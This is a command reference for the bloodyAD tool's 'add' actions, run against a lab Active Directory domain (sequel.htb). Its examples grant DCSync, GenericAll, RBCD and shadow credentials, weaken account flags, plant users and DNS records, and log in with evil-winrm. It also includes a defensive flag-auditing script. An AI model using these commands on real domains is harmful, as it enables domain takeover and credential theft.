# Add Examples

## Add computer

Adds a new computer.

```bash
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add computer "PwnnetComputer" "PwnnetTeam"
```

**Info:** Make sure to provide the domain FQDN as the `-d` global argument (e.g. `-d bloody.lab`), or you will run into an error such as `problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 9026b (dNSHostName)`.

**Warning:** Give the computer name without a trailing `$` (e.g. `Computer`, not `Computer$`).
## Add DCSync

Adds the DCSync right on the domain to the provided trustee (requires owning the domain object or having WriteDacl on it).

```bash
# sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add dcsync "rose"
# SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add dcsync "S-1-5-21-548670397-972687484-3496335370-1601"
# Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add dcsync "CN=Rose Fox,CN=Users,DC=sequel,DC=htb"
```
## Add genericAll

Gives the trustee full control over the target (you must own the object or have WriteDacl on it).

```bash
# sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll "CA_SVC" "ryan"
# SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll "S-1-5-21-548670397-972687484-3496335370-1607" "S-1-5-21-548670397-972687484-3496335370-1114"
# Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll "CN=Certification Authority,CN=Users,DC=sequel,DC=htb" "CN=Ryan Howard,CN=Users,DC=sequel,DC=htb"
```
## Add groupMember

Adds a new member (user, group or computer) to a group.

```bash
# sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add groupMember "Management Department" "Rose"
# SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add groupMember "S-1-5-21-548670397-972687484-3496335370-1602" "S-1-5-21-548670397-972687484-3496335370-1601"
# Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add groupMember "CN=Management Department,CN=Users,DC=sequel,DC=htb" "CN=Rose Fox,CN=Users,DC=sequel,DC=htb"
```
## Add RBCD

Adds Resource-Based Constrained Delegation for the service on the target, which lets the service impersonate a user on the target (requires "Write" permission on the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute and Windows Server 2012 or later).

```bash
# sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add rbcd "Rose" "Management Department"
# SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add rbcd "S-1-5-21-548670397-972687484-3496335370-1601" "S-1-5-21-548670397-972687484-3496335370-1602"
# Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add rbcd "CN=Rose Fox,CN=Users,DC=sequel,DC=htb" "CN=Management Department,CN=Users,DC=sequel,DC=htb"
```
## Add shadowCredentials

Adds Key Credentials to the target, used to impersonate the target with the added credentials.

```bash
# sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add shadowCredentials "Rose"
# SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add shadowCredentials "S-1-5-21-548670397-972687484-3496335370-1601"
# Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add shadowCredentials "CN=Rose Fox,CN=Users,DC=sequel,DC=htb"
```

**Warning**

- The DC must run at least Windows Server 2016 (msDS-KeyCredentialLink is only available since the 2016 AD schema). To verify, either:
  - query the RootDSE of the DC with `get object ''` and verify that domainControllerFunctionality is 7 or above, or
  - query the nTDSDSA object of the DC, e.g. `get object CN=NTDS Settings,CN=ALLMIGHTY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bloody,DC=lab --attr msDS-Behavior-Version`
- Be in a domain where the DC has AD CS enabled or a certificate authority set up, otherwise PKINIT will not work.
## Add UAC

Adds userAccountControl property flags that alter the behavior of a user or computer object.

```bash
# sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add uac "Rose" -f DONT_REQ_PREAUTH
# SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add uac "S-1-5-21-548670397-972687484-3496335370-1601" -f PASSWD_NOTREQD
# Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add uac "CN=Rose Fox,CN=Users,DC=sequel,DC=htb" -f DONT_EXPIRE_PASSWD
```
### UserAccountControl Flags

| Property Flag | Description |
|---|---|
| SCRIPT | The logon script will be run. |
| ACCOUNTDISABLE | The user account is disabled. |
| HOMEDIR_REQUIRED | The home folder is required. |
| PASSWD_NOTREQD | No password is required. |
| PASSWD_CANT_CHANGE | The user can't change the password. It's a permission on the user's object. |
| ENCRYPTED_TEXT_PASSWORD_ALLOWED | The user can send an encrypted password. |
| TEMP_DUPLICATE_ACCOUNT | It's an account for users whose primary account is in another domain. Provides access to this domain but not to trusting domains. |
| NORMAL_ACCOUNT | It's a default account type that represents a typical user. |
| INTERDOMAIN_TRUST_ACCOUNT | It's a permit to trust an account for a system domain that trusts other domains. |
| WORKSTATION_TRUST_ACCOUNT | It's a computer account for a workstation or server that is a member of this domain. |
| SERVER_TRUST_ACCOUNT | It's a computer account for a domain controller that is a member of this domain. |
| DONT_EXPIRE_PASSWD | Represents the password, which should never expire on the account. |
| MNS_LOGON_ACCOUNT | It's an MNS logon account. |
| SMARTCARD_REQUIRED | Forces the user to log on using a smart card. |
| TRUSTED_FOR_DELEGATION | Service account is trusted for Kerberos delegation. |
| NOT_DELEGATED | The security context of the user isn't delegated to a service even if the service account is trusted for Kerberos delegation. |
| USE_DES_KEY_ONLY | Restricts this principal to use only DES encryption types for keys. |
| DONT_REQUIRE_PREAUTH | This account doesn't require Kerberos pre-authentication for logging on. |
| PASSWORD_EXPIRED | The user's password has expired. |
| TRUSTED_TO_AUTH_FOR_DELEGATION | The account is enabled for delegation, allowing it to assume a client's identity and authenticate as that user to other servers. |
| PARTIAL_SECRETS_ACCOUNT | The account is a read-only domain controller (RODC). Removing this compromises security on the server. |
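AD stores these flags on the object as a single integer in the userAccountControl attribute, so an `add uac -f ...` change shows up as one changed number. The script below is an added example (not bloodyAD code) that decodes such an integer into the names in the table above and reports the bits that weaken authentication, which is what a defender reviewing modified accounts wants to see. Bit values are the standard Active Directory constants; the table spells one flag DONT_REQUIRE_PREAUTH whereas bloodyAD's `-f` option uses DONT_REQ_PREAUTH for the same bit; all sample values are constructed.

```python
"""Decode a userAccountControl integer into the property-flag names above.

Added example, not bloodyAD code. Bit values are the standard AD constants;
names follow the table on this page. All sample values are constructed."""
from functools import reduce
from operator import or_

UAC_FLAGS = {
    "SCRIPT": 0x0001, "ACCOUNTDISABLE": 0x0002, "HOMEDIR_REQUIRED": 0x0008,
    "PASSWD_NOTREQD": 0x0020, "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PASSWORD_ALLOWED": 0x0080, "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200, "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000, "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWD": 0x10000, "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000, "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000, "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQUIRE_PREAUTH": 0x400000, "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}

# Flags that weaken authentication when set on an ordinary user account
# (the ones the "add uac" examples above set, plus the delegation bits).
RISKY_FLAGS = {"DONT_REQUIRE_PREAUTH", "PASSWD_NOTREQD", "DONT_EXPIRE_PASSWD",
               "USE_DES_KEY_ONLY", "TRUSTED_FOR_DELEGATION",
               "TRUSTED_TO_AUTH_FOR_DELEGATION"}


def decode_uac(value: int) -> list[str]:
    """Names of every flag bit set in `value`, lowest bit first."""
    return [n for n, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1])
            if value & bit]


def encode_uac(*names: str) -> int:
    """Combine flag names into the integer AD stores (inverse of decode_uac)."""
    return reduce(or_, (UAC_FLAGS[n] for n in names), 0)


def audit_uac(value: int) -> list[str]:
    """Risky flags present in `value`, sorted so the output is stable."""
    return sorted(f for f in decode_uac(value) if f in RISKY_FLAGS)


if __name__ == "__main__":
    # Constructed: a normal user before and after `add uac ... -f DONT_REQ_PREAUTH`
    before = encode_uac("NORMAL_ACCOUNT")
    after = before | UAC_FLAGS["DONT_REQUIRE_PREAUTH"]
    for label, uac in (("before", before), ("after", after)):
        print(f"{label}: {uac} ({uac:#x}) {decode_uac(uac)} risky={audit_uac(uac)}")
```

Feeding the userAccountControl values from an LDAP export of the accounts touched during an engagement through `audit_uac` gives a quick list of what needs to be reverted.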
## Add User

Adds a new user.

```bash
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add user "3ky" "GoPwnnetTeam"
```

The flow can be continued with this example: add the new user to the Remote Management Users group and log in with evil-winrm.

```bash
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add groupMember "Remote Management Users" "3ky"
evil-winrm -i 10.129.222.191 -u "3ky" -p "GoPwnnetTeam"
```
## Add dnsRecord

Adds a new DNS record to the AD-integrated DNS of the environment.

```bash
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add dnsRecord dc02.sequel.htb 10.10.14.206
```

The following options can be added:

```text
-h, --help               show this help message and exit
--dnstype {A,AAAA,CNAME,MX,PTR,SRV,TXT}
                         DNS record type (default: A)
--zone ZONE              DNS zone (default: CurrentDomain)
--ttl TTL                DNS record TTL, time in seconds the record stays in DNS caches, must be low if you want to propagate record updates quickly (default: 300)
--preference PREFERENCE  DNS MX record preference, must be lower than the concurrent records to be chosen (default: 10)
--port PORT              listening port of the service in a DNS SRV record (default: None)
--priority PRIORITY      priority of a DNS SRV record against concurrent, must be lower to be chosen, if identical to others, highest weight will be chosen (default: 10)
--weight WEIGHT          weight of a DNS SRV record against concurrent, must be higher with the lowest priority to be chosen (default: 60)
--forest                 if set, registers dns record in forest instead of domain (default: False)
```